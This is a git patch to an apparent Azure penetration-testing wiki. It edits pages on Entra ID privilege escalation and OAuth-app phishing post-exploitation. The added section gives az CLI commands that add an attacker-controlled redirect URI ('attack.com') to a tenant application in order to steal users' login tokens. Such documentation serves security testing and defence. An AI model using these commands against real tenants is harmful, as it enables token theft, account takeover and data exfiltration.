From 713e9eb1abf4b07fede538187b25d1c9db79804b Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 1 Dec 2024 22:21:32 +0000 Subject: [PATCH] GITBOOK-719: No subject --- .../az-entraid-privesc/README.md | 18 ++++++++++++++++-- .../az-oauth-apps-phishing.md | 12 +++++++++++- 2 files changed, 27 insertions(+), 3 deletions(-) diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index dc65b707c7..533dd93bce 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -89,8 +89,7 @@ az ad app credential reset --id --append ### `microsoft.directory/applications/owners/update` -**Description**: Update owners of applications\ -**Abuse Potential**: By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. +By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. ```bash az ad app owner add --id --owner-object-id @@ -100,6 +99,21 @@ az ad app credential reset --id --append az ad app owner list --id ``` +### `microsoft.directory/applications/allProperties/update` + +An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything. + +Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions. + +{% code overflow="wrap" %} +```bash +# Get current redirect uris +az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" +# Add a new redirect URI (make sure to keep the configured ones) +az ad app update --id --web-redirect-uris "https://original.com/callback https://attack.com/callback" +``` +{% endcode %} + ## Service Principals ### `microsoft.directory/servicePrincipals/credentials/update` diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md index 7b0bd267fd..540e9a615f 100644 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md +++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md @@ -152,7 +152,17 @@ curl -X GET \ ## Post-Exploitation -Once you got access to the user you can do things such as stealing sensitive documents and even uploading backdoored document files. +### Phishing Post-Exploitation + +Depending on the requested permissions you might be able to **access different data of the tenant** (list users, groups... or even modify settings) and **information of the user** (files, notes, emails...). Then, you can use this permissions to perform those actions. + +### Application Post Exploitation + +Check the Applications and Service Principal sections of the page: + +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %} +[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/) +{% endcontent-ref %} ## References